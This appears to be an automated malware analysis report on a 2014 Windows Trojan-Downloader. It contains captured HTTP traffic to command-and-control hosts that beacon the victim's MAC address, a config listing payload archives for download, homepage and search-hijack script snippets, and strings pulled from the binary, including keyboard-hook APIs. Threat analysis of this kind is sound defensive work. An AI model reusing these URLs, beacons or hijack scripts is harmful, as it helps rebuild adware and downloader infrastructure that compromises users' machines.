..background: url("close.png") no-repeat 0px 0px; padding: 0px; top: 0
px; width: 40px; height: 19px; color: rgb(11, 59, 140); font-size: 14p
x; vertical-align: 0px; position: relative;..}..#closehBtn:hover {...b
ackground: url("close.png") no-repeat -40px 0px;..}..#minBtn {...backg
round: url("min.png") no-repeat 0px 0px; padding: 0px; top: 0px; width
: 27px; height: 19px; color: rgb(11, 59, 140); font-size: 14px; vertic
al-align: 0px; position: relative;..}..#minBtn:hover {...background: u
rl("min.png") no-repeat -27px 0px;..}...wrapper {...margin: 0px auto; 
width: 698px; height: 399px; text-align: left;..}...normal_bg {...back
ground: url("normal_bg.png") no-repeat 0px 0px rgb(255, 255, 255);..}.
..body_bg {...position: relative;..}...header {...width: 698px; height
: 33px;..}...nav_box .refresh_box a {...background-image: url("ico_new
2.png"); background-repeat: no-repeat;..}...nav_box .on_bg {...backgro
und-image: url("ico_new2.png"); background-repeat: no-repeat;..}...nav
_box {...padding: 4px 0px 0px 10px; width: 688px;..}...nav_box span {.
..color: rgb(188, 202, 224); float: left;..}...nav_box a {...width: 45
px; height: 26px; text-align: center; color: rgb(11, 59, 140); padding
-top: 3px; font-size: 14px; text-decoration: none; display: inline-blo
ck; position: relative; _vertical-align: middle;..}...nav_box .on_bg {
...background-position: 0px -460px; left: 18px; width: 9px; height<<< skipped >>>

GET /web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 HTTP/1.1

User-Agent: Crazyk

Host: stat.fjmjm.com

Cookie: ASPSESSIONIDAQRTSTST=EPJENNHDMNNMPGBNECGBPKIL


HTTP/1.1 200 OK

Date: Sat, 24 May 2014 04:45:55 GMT

Server: Microsoft-IIS/6.0

Who: ShanIE

Content-Length: 4659

Content-Type: text/html

Cache-control: private
..<?xml version="1.0" encoding="gb2312"?>..<SoftwareConfig>
;..  <Version>20140524124555</Version>..  <Popwin>..
.    <Item id="1">..      <Subject>........</Subject>
;..      <WinWidth>708</WinWidth>..      <WinHeight>
404</WinHeight>..      <StartUpPosition>0</StartUpPosit
ion>..      <URL>hXXp://VVV.mdtxw.org/miniindex/</URL> 
..      <StartUpTime>10</StartUpTime>..      <ShowIntev
al>7200</ShowInteval>..      <AutoClose>600</AutoClo
se>..      <isShow>1</isShow>..    </Item>..    &
lt;Item id="2">..      <Subject>........</Subject>..   
  <WinWidth>300</WinWidth>..      <WinHeight>265<
/WinHeight>..      <StartUpPosition>1</StartUpPosition>
..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140524124555&
lt;/URL> ..      <StartUpTime>50</StartUpTime>..      &
lt;ShowInteval>0</ShowInteval>..      <AutoClose>50<
/AutoClose>..      <isShow>1</isShow>..    </Item>
;..    <Item id="3">..      <Subject>....LB</Subject>
;..      <WinWidth>300</WinWidth>..      <WinHeight>
265</WinHeight>..      <StartUpPosition>1</StartUpPosit
ion>..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140524
124555</URL>..      <StartUpTime>200</StartUpTime>..
      <ShowInteval>7200</ShowInteval>..      <AutoC<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)

Host: VVV.jlbnh.com

Connection: Keep-Alive


HTTP/1.1 302 Redirect

Content-Length: 150

Content-Type: text/html

Location: hXXp://123.sogou.com/?22014

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sat, 24 May 2014 04:45:51 GMT
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://123.sogou.com/?22014">here</a></body>
..

GET /stat/?ac=stat&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Host: stat.fjmjm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 24 May 2014 04:45:47 GMT

Server: Microsoft-IIS/6.0

Who: ShanIE

Content-Length: 0

Content-Type: text/html

Set-Cookie: ASPSESSIONIDAQRTSTST=EOJENNHDIJCJEAMBBNDDGCGM; path=/

Cache-control: private

GET /web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000 HTTP/1.1

User-Agent: hello crazyk

Host: stat.fjmjm.com


HTTP/1.1 200 OK

Date: Sat, 24 May 2014 04:45:55 GMT

Server: Microsoft-IIS/6.0

Who: ShanIE

Content-Length: 4659

Content-Type: text/html

Set-Cookie: ASPSESSIONIDAQRTSTST=EPJENNHDMNNMPGBNECGBPKIL; path=/

Cache-control: private
..<?xml version="1.0" encoding="gb2312"?>..<SoftwareConfig>
;..  <Version>20140524124555</Version>..  <Popwin>..
.    <Item id="1">..      <Subject>........</Subject>
;..      <WinWidth>708</WinWidth>..      <WinHeight>
404</WinHeight>..      <StartUpPosition>0</StartUpPosit
ion>..      <URL>hXXp://VVV.mdtxw.org/miniindex/</URL> 
..      <StartUpTime>10</StartUpTime>..      <ShowIntev
al>7200</ShowInteval>..      <AutoClose>600</AutoClo
se>..      <isShow>1</isShow>..    </Item>..    &
lt;Item id="2">..      <Subject>........</Subject>..   
  <WinWidth>300</WinWidth>..      <WinHeight>265<
/WinHeight>..      <StartUpPosition>1</StartUpPosition>
..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140524124555&
lt;/URL> ..      <StartUpTime>50</StartUpTime>..      &
lt;ShowInteval>0</ShowInteval>..      <AutoClose>50<
/AutoClose>..      <isShow>1</isShow>..    </Item>
;..    <Item id="3">..      <Subject>....LB</Subject>
;..      <WinWidth>300</WinWidth>..      <WinHeight>
265</WinHeight>..      <StartUpPosition>1</StartUpPosit
ion>..      <URL>hXXp://stat.fjmjm.com/a/cpv1.html?t=20140524
124555</URL>..      <StartUpTime>200</StartUpTime>..
      <ShowInteval>7200</ShowInteval>..      <AutoC<<< skipped >>>

GET /?22014 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Sat, 24 May 2014 04:45:51 GMT

Content-Type: text/html; charset=gbk

Transfer-Encoding: chunked

Connection: keep-alive

P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"

Content-Encoding: gzip
9105................\.u7...{b!..=.....5...6.E........7.2....12N... .!.
.$....h..q..M.;!N..yc..?...Zn...G.......uOU.:.......;...O|..C....J<
...G.>.H.ff..?03s....o<....$..L.....4..n.i....r2.l..........z>
;...g....q........x3].V. .R....TW..6.-w...3..}r...s........}~.W..`...[
........$.....zw..t....W.l.C.S..R..Qsm9.....R....3l.[n2Q.v.ng..|......
......%.3 ......'6z..C..p...Ti8..;\..W1.............W.F............\..
f...~..M.....^.q...7.....[...];w....~..'.....'.~...1Z.|.._... .4}.....
/....K.}...............Q....*.f......W5....x..?....S.|...N...}.......i
t'.s...S'.s..U....?8}.;/\>..S......x.?O...........}t......{?=..;.|.
.O...?{...z..Ih8.......^y..?_...>..og_..#..._.|...<.V.......d...
L4.nm99.l;uw0Ss...4./.hW.R..!V.P....)....@K..=..}.Ys.....9..`8\.J.....
..8....']w.O4.......T....ba9....xu....RG........bw..u.L...e.V..&.J.C.?
..tf.C.ue.2...<X*.D.....G.L:..wR.f'}t........\....N..<...js-].5.
ni.......,..j..z.r..Z.W.vb.C0..?N....z.....j..$?w..T..?I....F...)..|%W
.....3=jM........t....Fn....M...Z...nvz....m...t..e.......ju.mo..~..Y.
../..j.....m'..[e......v.mg..mu..S...-....n...Bv;....Ui.N....6.G.D...j
..)...Y....p......\.e_6A3..}.....zc....nu.I7..E..Q.W<..].....b.....
s..-... .......P...u..0..Mh.*;..z.._..j...=5...Q...,...]..,....5wi3..r
./.-. .S........4HL|}...V...V.o.7...b6......[@{k......2...a.....O...f5
1U...RO..)..hh.f.....z....T.j>.).?e..#..3.v!4h........K.;. 6y2..`U.
?[......09(.M...A..Qo.Zo...C.#.......[....~/..O ...Z>73Xmv.i.{`O..M
........S.>.[....r6...neU""_4.M8..H?x..&A.O....4......3...h..a.<<< skipped >>>

GET /miniindex/ HTTP/1.1

User-Agent: hello crazyk

Host: VVV.mdtxw.org


HTTP/1.1 200 OK

Content-Length: 10093

Content-Type: text/html

Content-Location: hXXp://VVV.mdtxw.org/miniindex/index.html

Last-Modified: Thu, 22 May 2014 11:22:12 GMT

Accept-Ranges: bytes

ETag: "684ac813b075cf1:3b8"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sat, 24 May 2014 04:46:07 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">...<head>....<meta http
-equiv="Content-Type" content="text/html; charset=gb2312">....<m
eta http-equiv="Cache-Control" content="no-cache">....<meta name
="robots" content="noindex, nofollow,nosnippet,noarchive,noodp">...
.<title>..........</title>....<link href="inc/stylemini
.css" rel="stylesheet" type="text/css">....<script src="inc/jque
ry-1.7.2.min.js" type="text/javascript"></script>....<base
 target="_blank">..<script type="text/javascript"> ..<!-- 
..//..........//document.oncontextmenu=function(e){return false;}..//.
...........var cusi=0;..var tiaozuan=1;..var timer;..//..............v
ar bq_array = new Array();..//........,....id,........url,............
(1....,..............class) ......url ......bq_array.push(["....","0",
"","0","","0"]);..bq_array.push(["....","105","hXXp://VVV.jgtj.com.cn/
ll","0","xinwen.htm","0"]);..bq_array.push(["....","101","hXXp://VVV.j
gtj.com.cn/ll","0","nvxing_509_366.htm","0"]);..bq_array.push(["....",
"102","hXXp://VVV.jgtj.com.cn/ll","0","lieqi_509_366.htm","0"]);..bq_a
rray.push(["....","100","hXXp://VVV.jgtj.com.cn/ll","0","shehui_509_36
6.htm","0"]);..bq_array.push(["....","120","hXXp://VVV.jgtj.com.cn/ll"
,"0","jiankang_509_366.htm","0"]);..bq_array.push(["....","130","http:
//VVV.jgtj.com.cn/ll","0","meinv.htm","0"]);..bq_array.push(["....<<< skipped >>>

GET /miniindex/ HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 10093

Content-Type: text/html

Content-Location: hXXp://VVV.mdtxw.org/miniindex/index.html

Last-Modified: Thu, 22 May 2014 11:22:12 GMT

Accept-Ranges: bytes

ETag: "684ac813b075cf1:3b8"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sat, 24 May 2014 04:46:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">...<head>....<meta http
-equiv="Content-Type" content="text/html; charset=gb2312">....<m
eta http-equiv="Cache-Control" content="no-cache">....<meta name
="robots" content="noindex, nofollow,nosnippet,noarchive,noodp">...
.<title>..........</title>....<link href="inc/stylemini
.css" rel="stylesheet" type="text/css">....<script src="inc/jque
ry-1.7.2.min.js" type="text/javascript"></script>....<base
 target="_blank">..<script type="text/javascript"> ..<!-- 
..//..........//document.oncontextmenu=function(e){return false;}..//.
...........var cusi=0;..var tiaozuan=1;..var timer;..//..............v
ar bq_array = new Array();..//........,....id,........url,............
(1....,..............class) ......url ......bq_array.push(["....","0",
"","0","","0"]);..bq_array.push(["....","105","hXXp://VVV.jgtj.com.cn/
ll","0","xinwen.htm","0"]);..bq_array.push(["....","101","hXXp://VVV.j
gtj.com.cn/ll","0","nvxing_509_366.htm","0"]);..bq_array.push(["....",
"102","hXXp://VVV.jgtj.com.cn/ll","0","lieqi_509_366.htm","0"]);..bq_a
rray.push(["....","100","hXXp://VVV.jgtj.com.cn/ll","0","shehui_509_36
6.htm","0"]);..bq_array.push(["....","120","hXXp://VVV.jgtj.com.cn/ll"
,"0","jiankang_509_366.htm","0"]);..bq_array.push(["....","130","http:
//VVV.jgtj.com.cn/ll","0","meinv.htm","0"]);..bq_array.push(["....<<< skipped >>>

GET /miniindex/tj.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 279

Content-Type: application/x-javascript

Last-Modified: Thu, 10 Apr 2014 18:44:12 GMT

Accept-Ranges: bytes

ETag: "0665eddec54cf1:3b8"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sat, 24 May 2014 04:46:08 GMT
var cnzz_protocol = (("https:" == document.location.protocol) ? " http
s://" : " hXXp://");document.write(unescape(""));.
.

GET /stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Host: stat.fjmjm.com

Cache-Control: no-cache

Cookie: ASPSESSIONIDAQRTSTST=KNJENNHDONBIEPLGNFNANOJL


HTTP/1.1 200 OK

Date: Sat, 24 May 2014 04:45:38 GMT

Server: Microsoft-IIS/6.0

Who: ShanIE

Content-Length: 4514

Content-Type: text/html

Cache-control: private
..[ShortCut_1]..Desc=360............Hint=360............Name=360......
......URL=hXXp://VVV.jlbnh.com..Icon=ico\360.ico..[ShortCut_2]..Desc=I
nternet Explorer..Hint=Internet Explorer..Name=Internet Explorer..URL=
hXXp://VVV.jlbnh.com..Icon=ico\ie.ico..[SoftWare_1]..Desc=..........Hi
nt=..........Name=F30241_s_0523..URL=hXXp://down.jsrjrc.org:99/F30241_
s_0523.rar..reg=HKLM\SOFTWARE\Baidu\BaiduSd\InstallDir..[SoftWare_2]..
Desc=..........Hint=..........Name=cgqhlv_70690..URL=hXXp://down.jsrjr
c.org:99/cgqhlv_70690.rar..reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir.
.[SoftWare_3]..Desc=..........Hint=..........Name=KXWebBox_3409_RBF..U
RL=hXXp://down.jsrjrc.org:99/KXWebBox_3409_RBF.rar..reg=HKLM\SOFTWARE\
Microsoft\Windows\CurrentVersion\App Paths\XXGameBox.exe\..[SoftWare_4
]..Desc=..........Hint=..........Name=pczh_98_2..URL=hXXp://down.jsrjr
c.org:99/pczh_98_2.rar..reg=HKLM\SOFTWARE\Microsoft\Windows\CurrentVer
sion\App Paths\Ainqngz3.9.exe\..[SoftWare_5]..Desc=......Hint=......Na
me=kuping_b_54282..URL=hXXp://down.jsrjrc.org:99/kuping_b_54282.rar..r
eg=HKCU\Software\Kuping\InstallPath..[SoftWare_6]..Desc=..............
Hint=..............Name=qiqibox_1016..URL=hXXp://down.jsrjrc.org:99/qi
qibox_1016.rar..reg=HKLM\SOFTWARE\qiqibox\InstallPath..[SoftWare_7]..D
esc=........Hint=........Name=-8853_1_mvy..URL=hXXp://down.jsrjrc.org:
99/-8853_1_mvy.rar..reg=HKLM\SOFTWARE\Mnying\Mnyingfiledir..[SoftWare_
8]..Desc=...... ..Hint=........Name=yxku_s[106]..URL=hXXp://down.jsrjr
c.org:99/yxku_s[106].rar..reg=HKCU\Software\yxkuBox\InstallPath..[<<< skipped >>>

GET /web/welcome_cn.htm?ver=2.4.1.9&guid=a24a7d04104ebf0095dce7c62dcb34c065ffccc6f6834a08ba51a487958340021400889203&lastver= HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)

Host: VVV.fjmjm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 1469

Content-Type: text/html

Last-Modified: Thu, 17 Apr 2014 15:55:27 GMT

Accept-Ranges: bytes

ETag: "80414a73555acf1:3b8"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sat, 24 May 2014 04:45:51 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<meta http-equiv="Content-Type" conten
t="text/html; charset=gb2312">..<title>................</t
itle>..<link href="newioage.css" rel="stylesheet" type="text/css
">..</head>..<body>..<p> </p>..<tab
le width="712" height="49" border="0" align="center" cellpadding="0" c
ellspacing="0">..  <tr>..    <td background="images/guide_
top.jpg"><table width="550" align="center">..        <tr&g
t;..          <td class="t14"><font color="#C8E2FF"><st
rong>................</strong></font></td>..     
   </tr>..      </table></td>..  </tr>..</t
able>..<table width="712" height="350" align="center" background
="images/texture.gif" bgcolor="#FFFFFF">..  <tr>..    <td 
valign="top">..<table width="500" align="center">..        &l
t;tr>..          <td><p class="t14"> </p>.. 
           <p class="t14"><font color="#D38C45" size="4">&
lt;strong>..............................</strong></font>
;</p>..            <p class="t14">........................
..................................................................<
/p>..            <p class="t14"> </p>..           
 </td>..        </tr>..      </table>..      <tab
le width="500" align="center">..        <tr> ..          <<< skipped >>>

GET /web/newioage.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a24a7d04104ebf0095dce7c62dcb34c065ffccc6f6834a08ba51a487958340021400889203&lastver=

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)

Host: VVV.fjmjm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 715

Content-Type: text/css

Last-Modified: Thu, 17 Apr 2014 15:40:05 GMT

Accept-Ranges: bytes

ETag: "8038bc4d535acf1:3c0"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sat, 24 May 2014 04:45:53 GMT
body {background-color: #dddddd;margin-left: 0px;margin-top: 0px;margi
n-right: 0px;margin-bottom: 0px;}.td {font-size: 14px;line-height: 150
%;color: #666666;}..t12 {font-size: 12px;line-height: 150%;color: #666
666;}..A:link {font-size:12px;text-decoration:none;color: #1F72D0}.A:v
isited {font-size:12px;text-decoration:none;color: #1F72D0}.A:active {
font-size:12px;text-decoration: none;color: #033B7D}.A:hover {font-siz
e:12px;text-decoration:none;color: #FF5A00}..A.white:link {font-size:1
2px;text-decoration:none;color: #cfebff}.A.white:visited {font-size:12
px;text-decoration:none;color: #cfebff}.A.white:active {font-size:12px
;text-decoration: none;color: #ffffff}.A.white:hover {font-size:12px;c
olor: #feffcf}...

The Trojan-Downloader connects to the servers at the folowing location(s):

%original file name%.exe_2196:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

http://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\bind.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\bind.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp

<^.Wa

*.EZ_

_.mJa

nsx2.tmp

0, 0, 0)

S~1\Temp\nsx2.tmp

%original file name%.exe

c:\%original file name%.exe

%Program Files%\shandian"

%Program Files%\shandian

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nss1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

Nullsoft Install System v2.45

%Documents and Settings%\%current user%\Start Menu\Programs\

%original file name%.exe_2196_rwx_10004000_00001000:

callback%d

shandian.exe_3776:

.text

`.rdata

@.data

.rsrc

SSSSh

RSSSSh

QSSSSh

SRjdPSSSSh

QSSSShD

PSSSSh

QSSSShC

SSShT

;;~%U

F\t SSh

FHSSh

VHSSh

F<%u?

t.SVP

unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll

<4,$?7/'

(3-!0,1'8"5.*2$

inflate 1.2.3 Copyright 1995-2005 Mark Adler

WINMM.dll

WS2_32.dll

IMM32.dll

VERSION.dll

GetWindowsDirectoryW

GetProcessHeap

KERNEL32.dll

GetKeyState

GetAsyncKeyState

EnumThreadWindows

EnumWindows

keybd_event

MapVirtualKeyW

EnumChildWindows

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyboardLayoutNameW

LoadKeyboardLayoutW

GetKeyNameTextW

RegisterHotKey

UnregisterHotKey

USER32.dll

GDI32.dll

comdlg32.dll

RegCloseKey

RegOpenKeyW

RegCreateKeyW

RegDeleteKeyW

RegOpenKeyExW

RegGetKeySecurity

RegEnumKeyW

RegQueryInfoKeyW

RegSetKeySecurity

RegCreateKeyExW

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHFileOperationW

SHELL32.dll

ole32.dll

OLEAUT32.dll

CreateUrlCacheEntryW

CommitUrlCacheEntryW

GetUrlCacheEntryInfoW

InternetCrackUrlW

DeleteUrlCacheEntryW

HttpOpenRequestA

CommitUrlCacheEntryA

HttpAddRequestHeadersA

DeleteUrlCacheEntryA

FindCloseUrlCache

FindNextUrlCacheEntryA

UnlockUrlCacheEntryFileA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryW

UnlockUrlCacheEntryFileW

FindFirstUrlCacheEntryW

InternetCanonicalizeUrlW

FtpCommandW

FtpOpenFileW

HttpEndRequestW

HttpSendRequestExW

HttpOpenRequestW

FtpGetFileSize

HttpQueryInfoW

WININET.dll

DSOUND.dll

UrlCombineW

UrlIsOpaqueW

PathIsURLW

UrlGetPartW

SHDeleteKeyW

UrlCanonicalizeW

SHEnumKeyExW

UrlIsW

SHQueryInfoKeyW

SHLWAPI.dll

MSVCRT.dll

_acmdln

CoInternetCombineUrl

CoGetClassObjectFromURL

urlmon.dll

NETAPI32.dll

gdiplus.dll

WINTRUST.dll

COMCTL32.dll

URL=%s

_twpass

Content-Disposition: form-data; name="%s"

Content-Disposition: form-data; name="%s"; filename="%s"

cmdline

@%s#%s

%s%s; %s)

Referer: %s

msjava.dll

\msjava.dll

/uploaderapi2.swf

1.2.3

http://%s%s

HTTP/1.0

Mozilla/4.0

www1.baidu.com

www.baidu.com

baidu.com

.jpeg

\\.\PhysicalDrive%d

\\.\Scsi%d:

XXXXXX

ADD_DATE="%s"

LOVEFAV="%d"

LAST_MODIFIED="%s"

LAST_VISIT="%s"

%s=%s

%s=%s HTTPS=%s

0d

error %d with zipfile in unzCloseCurrentFile

error %d with zipfile in unzReadCurrentFile

extracting: %s

error opening %s

%s%s/

The file %s exists. Overwrite ? [y]es, [n]o, [A]ll:

error %d with zipfile in unzOpenCurrentFilePassword

creating directory: %s

error %d with zipfile in unzGetCurrentFileInfo

error %d with zipfile in unzGoToNextFile

error %d with zipfile in unzGetGlobalInfo

.html

.htm0

http:

NUL=%s

DIRNUL=%s

wininit.ini

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; TheWorld)

00000000000000000001

00000000000000000010

http= HTTPS=

var twFloatTimer%%s;

var twFloatEle%%s;

var twFloatEf%%s = "%ï";

function TWFloatFilterHide%%s( )

if( twFloatEf%%s == "0" )

twFloatEle%%s.removeNode( true );

if( twFloatEle%%s.filters.alpha.opacity > 30 )

twFloatEle%%s.filters.alpha.opacity-=30;

twFloatTimer%%s=window.setTimeout( "TWFloatFilterHide%%s()",100);

window.clearTimeout(twFloatTimer%%s);

twFloatEle%%s.filter="";

twFloatEle%%s.posWidth

twFloatEle%%s.posHeight

twFloatEle%%s.posLeft

twFloatEle%%s.posTop

twFloatEle%%s = document.getElementById( "%%id" );

if( twFloatEf%%s == "1" )

twFloatEle%%s.style.filter="Alpha(Opacity=100, FinishOpacity=0, Style=3)";

K0=http://*.google.c*/search?*q=*

S0=try{col=document.getElementsByName('q');external.SetSearchKey( %max_security_id,col[0].value );}catch (e) {}

K1=http://*.baidu.com/*?*=*

S1=try{col=document.getElementsByName('wd');var str;if( col.length )str= col[0].value;else{col=document.getElementsByName('word');if( col.length ){str

= col[0].value;}}if( str.length != 0 ){external.SetSearchKey( %max_security_id,col[0].value );}}

K2=http://search.live.com/*?q=*

S2=try{col=document.getElementsByName('q');external.SetSearchKey( %max_security_id,col[0].value );}catch (e) {}

SearchLeftPad=7

AdressLeftPad=8

****7@0**.32****

****23-**0@7****

<**19=?4****

****4?=91**<

(4**/8=?7 ***

*** 7?=8/**4(

****,**** ****

**** ****,****

44222222222

-.--.-..*)

$@/ 8"/

VS.iw1A<:7

this.isSel = false;

this.bg = this.create('div', '', {}, {'display': 'none', 'zoom': '1', 'filter': 'alpha(opacity=20)', 'backgroundColor': '#000000', 'position': 'absolute', 'zIndex': '998', 'textAlign': 'center', 'width': '100%', 'height': window.screen.availHeight   'px', 'left': '0px', 'top': parseInt(this.$dom.body.parentNode.scrollTop || 0, 10)   'px', 'margin': '0'});

this.pane = this.create('div', '', {'id': 'TW_Plugin_Vest_Pane'}, {'display': 'none', 'backgroundColor': '#FFFFFF', 'padding': '0', 'position': 'absolute', 'zIndex': '999', 'textAlign': 'left'});

this.$dom.body.appendChild(this.bg), this.$dom.body.appendChild(this.pane);

__$Effect.prototype = {

this.pane.innerHTML = '', this.pane.appendChild(b);

var el = this.$dom.createElement(tag);

for (var a in sty || {}) el.style[a] = sty[a];

txt && (el.innerHTML = txt), c && (el.onclick = c);

this.bg.style.display = 'none', this.pane.style.display = 'none', this.$dom.body.style.overflow = this.$dom.body.parentNode.style.overflow = '';

this.$dom.body.onselectstart = this.selEv || null;

setTimeout(function () {for(var i = 0; i < _tag('select').length; i   ) _tag('select')[i].style.visibility = 'visible';}, 1);

document.body.onkeypress = function () {

if(event.keyCode == 13)

URL_Openall();

document.body.scrollTop = 0;

return event.keyCode != 13;

fx && (this.fade(0, this.bg), this.fade(0), this.opacity = 0);

this.bg.style.display = '' , this.pane.style.display = '';

This.selEv = This.$dom.body.onselectstart, This.$dom.body.onselectstart = function() {return This.isSel;};

This.$dom.body.style.overflow = This.$dom.body.parentNode.style.overflow = 'hidden';

for(var i = 0; i < _tag('select').length; i   ) _tag('select')[i].style.visibility = 'hidden';

fx && (This.timer = window.setInterval(function () {

This.fade((This.opacity  = 10) / 100, This.bg);

if(This.opacity >= 20) {

clearInterval(This.timer);

This.fade(0.2, This.bg);

This.fade(0.99);

}, 100));

e = e || this.pane;

e.style.zoom = '1', e.style.filter = 'alpha(opacity='   parseInt(v >= 1 ? '99' : v * 100)   ')';

l && (this.pane.style.left = l   'px'), t && (this.pane.style.top = t   'px'), l == 0 && (this.pane.style.left = '0px'), t == 0 && (this.pane.style.top = '0px');

return (e || document).getElementsByTagName(t);

.white:link {font-size:12px;text-decoration:none;color: #eff8fb}

.white:visited {font-size:12px;text-decoration:none;color: #eff8fb}

.white:active {font-size:12px;text-decoration: none;color: #033B7D}

.white:hover {font-size:12px;text-decoration:none;color: #FF5A00}GIF89a6

A.cb:link {

A.cb:visited {

A.cb:active {

A.cb:hover {

.tlb {

.bb {

.bl {

background:url(callapse.gif) 90% 50% no-repeat;

background:url(callapse_hover.gif) 90% 50% no-repeat;

background:url(expand.gif) 90% 50% no-repeat;

background:url(expand_hover.gif) 90% 50% no-repeat;

var securityId = external.twGetSecurityID(window);

surl = "http://www.google.cn/search?client=aff-worldbrowser&channel=errorpage&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q="   encodeURI( searchtext.value );

window.open( surl );

surl = "http://www.baidu.com/baidu?word=" searchtext.value "&tn=ichuner_4_pg";

surl = "http://www.sogou.com/sogou?query=" searchtext.value "&pid=sogou-addr-6311b2f8bde6a1c3";

Function RequestQueryString( url, ArgName )

= trim(url)

If url = "" Or IsNull(url) Then

